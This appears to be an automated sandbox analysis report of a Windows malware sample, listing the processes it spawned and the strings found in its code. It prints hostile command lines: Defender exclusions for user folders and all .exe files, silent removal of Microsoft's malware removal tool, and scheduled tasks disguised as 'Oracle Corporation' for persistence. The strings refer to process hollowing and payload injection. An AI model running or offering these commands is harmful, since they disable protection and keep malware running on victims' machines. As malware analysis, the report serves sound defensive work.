Target ID:	74
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	11:38:44
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff7c0ef0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7428, Parent PID: 7376

General

Target ID:	85
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	11:38:45
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff642720000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	11:38:48
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	11:38:51
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	11:38:51
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	11:38:51
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	11:38:51
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	11:38:51
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	188
Start time:	11:39:05
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	202
Start time:	11:39:07
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	314
Start time:	11:39:32
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	329
Start time:	11:39:35
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	370
Start time:	11:39:43
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	427
Start time:	11:39:55
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	440
Start time:	11:39:58
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.1%
Total number of Nodes:	54
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF6099B1160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF6099B1156), ref: 00007FF6099B11A5
_amsg_exit.MSVCRT(?,?,?,00007FF6099B1156), ref: 00007FF6099B11CC
_initterm.MSVCRT ref: 00007FF6099B120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6099B1156), ref: 00007FF6099B124E
malloc.MSVCRT ref: 00007FF6099B127E
strlen.MSVCRT ref: 00007FF6099B12A4
malloc.MSVCRT ref: 00007FF6099B12B0
memcpy.MSVCRT ref: 00007FF6099B12C3
_cexit.MSVCRT(?,?,?,00007FF6099B1156), ref: 00007FF6099B132D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction ID: 30b2336c654c570a71ad6ee9cfe768a6f510e1ed3087a4f9d8cac203f3700915
Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction Fuzzy Hash: 2C512B71A1E64685FA209F16EAA037937B2BF49790F685535CE4EC73A7DE3CA481C340

Function 00007FF6099B1394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateDirectoryObject.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6099B1156), ref: 00007FF6099B13F7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CreateDirectoryObject
String ID:
API String ID: 4136754261-0
Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction ID: f2acd27a7cc536c051bb49c4b7ffeaa7e5eda9659cda30be7cd28862afe152a4
Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction Fuzzy Hash: 21F0F97290DB42D2D610CF51F84202E7BA2FB89381B244839EACC87726EF3CE9508F40

Non-executed Functions

Function 00007FF6099D3B80 Relevance: 140.1, APIs: 67, Strings: 12, Instructions: 1888COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6099D3CA1
memset.MSVCRT ref: 00007FF6099D3DC9
wcscat.MSVCRT ref: 00007FF6099D3DD9
memset.MSVCRT ref: 00007FF6099D3DED
wcslen.MSVCRT ref: 00007FF6099D3E56
_wcsnicmp.MSVCRT ref: 00007FF6099D3E89
wcslen.MSVCRT ref: 00007FF6099D3E95
wcscpy.MSVCRT ref: 00007FF6099D3F23
wcscat.MSVCRT ref: 00007FF6099D3F32
memset.MSVCRT ref: 00007FF6099D3F43
wcscpy.MSVCRT ref: 00007FF6099D406B
wcscat.MSVCRT ref: 00007FF6099D407A
memset.MSVCRT ref: 00007FF6099D4097
wcslen.MSVCRT ref: 00007FF6099D4113
_wcsnicmp.MSVCRT ref: 00007FF6099D4139
wcslen.MSVCRT ref: 00007FF6099D4149
wcscpy.MSVCRT ref: 00007FF6099D4362
wcscat.MSVCRT ref: 00007FF6099D4371
_wcsicmp.MSVCRT ref: 00007FF6099D4380
memset.MSVCRT ref: 00007FF6099D43B1
wcscpy.MSVCRT ref: 00007FF6099D4419
wcscat.MSVCRT ref: 00007FF6099D4428
memset.MSVCRT ref: 00007FF6099D443C
wcscpy.MSVCRT ref: 00007FF6099D44C2
wcscat.MSVCRT ref: 00007FF6099D44D1
memset.MSVCRT ref: 00007FF6099D44E5
wcscpy.MSVCRT ref: 00007FF6099D4538
wcscat.MSVCRT ref: 00007FF6099D4547
memset.MSVCRT ref: 00007FF6099D455B
wcscpy.MSVCRT ref: 00007FF6099D45EE
wcscat.MSVCRT ref: 00007FF6099D45FD
memset.MSVCRT ref: 00007FF6099D4611
wcscpy.MSVCRT ref: 00007FF6099D4679
wcscat.MSVCRT ref: 00007FF6099D4688
memset.MSVCRT ref: 00007FF6099D469C
wcslen.MSVCRT ref: 00007FF6099D4705
_wcsnicmp.MSVCRT ref: 00007FF6099D4739
wcslen.MSVCRT ref: 00007FF6099D4745
wcscat.MSVCRT ref: 00007FF6099D476C
memset.MSVCRT ref: 00007FF6099D4780
wcscpy.MSVCRT ref: 00007FF6099D480F
wcscat.MSVCRT ref: 00007FF6099D481E
memset.MSVCRT ref: 00007FF6099D4B0A
wcscpy.MSVCRT ref: 00007FF6099D4B70
wcscat.MSVCRT ref: 00007FF6099D4B7F

Part of subcall function 00007FF6099D8410: memset.MSVCRT ref: 00007FF6099D842F
Part of subcall function 00007FF6099D8410: wcscpy.MSVCRT ref: 00007FF6099D8490
Part of subcall function 00007FF6099D8410: wcscat.MSVCRT ref: 00007FF6099D849B
Part of subcall function 00007FF6099D8410: wcslen.MSVCRT ref: 00007FF6099D84AC

wcslen.MSVCRT ref: 00007FF6099D4C97
wcslen.MSVCRT ref: 00007FF6099D4DFA
_wcsicmp.MSVCRT ref: 00007FF6099D4E67

Part of subcall function 00007FF6099D79B0: memset.MSVCRT ref: 00007FF6099D79DD

memset.MSVCRT ref: 00007FF6099D4FB5
wcscpy.MSVCRT ref: 00007FF6099D5044
wcscat.MSVCRT ref: 00007FF6099D5053
memset.MSVCRT ref: 00007FF6099D50A7
wcscpy.MSVCRT ref: 00007FF6099D50B9
wcscat.MSVCRT ref: 00007FF6099D50C8
_wcsicmp.MSVCRT ref: 00007FF6099D5264
memset.MSVCRT ref: 00007FF6099D5283
wcscpy.MSVCRT ref: 00007FF6099D52E4
wcscat.MSVCRT ref: 00007FF6099D52F6
wcslen.MSVCRT ref: 00007FF6099D5309

Part of subcall function 00007FF6099D7F20: memset.MSVCRT ref: 00007FF6099D7F82
Part of subcall function 00007FF6099D7F20: memset.MSVCRT ref: 00007FF6099D8015
Part of subcall function 00007FF6099D7F20: wcscpy.MSVCRT ref: 00007FF6099D806D
Part of subcall function 00007FF6099D7F20: wcscat.MSVCRT ref: 00007FF6099D8078
Part of subcall function 00007FF6099D7F20: wcslen.MSVCRT ref: 00007FF6099D8089

wcslen.MSVCRT ref: 00007FF6099D576B
memset.MSVCRT ref: 00007FF6099D5831
wcslen.MSVCRT ref: 00007FF6099D589A
_wcsnicmp.MSVCRT ref: 00007FF6099D58C9
wcslen.MSVCRT ref: 00007FF6099D58D5
wcscat.MSVCRT ref: 00007FF6099D58FC
memset.MSVCRT ref: 00007FF6099D5B5B
memcpy.MSVCRT ref: 00007FF6099D6196

Strings

[INFO] Process handle closed, xrefs: 00007FF6099D5CCF
[INFO] Mutex already exists: %s, xrefs: 00007FF6099D5803
[SUCCESS] Process handle obtained: 0x%p, xrefs: 00007FF6099D5CB8
[SUCCESS] Payload decrypted, size: %zu bytes, xrefs: 00007FF6099D5978
[INFO] inject_process completed, xrefs: 00007FF6099D5816
[ERROR] Failed to decrypt payload, xrefs: 00007FF6099D5B3D
[INFO] Process hollowing executed for program: %s, xrefs: 00007FF6099D5C9F
, xrefs: 00007FF6099D5371
VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn, xrefs: 00007FF6099D50E5
[ERROR] Invalid process handle, xrefs: 00007FF6099D5CE0
[INFO] inject_process started, xrefs: 00007FF6099D574A
[INFO] Mutex not found: %s, xrefs: 00007FF6099D5938

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
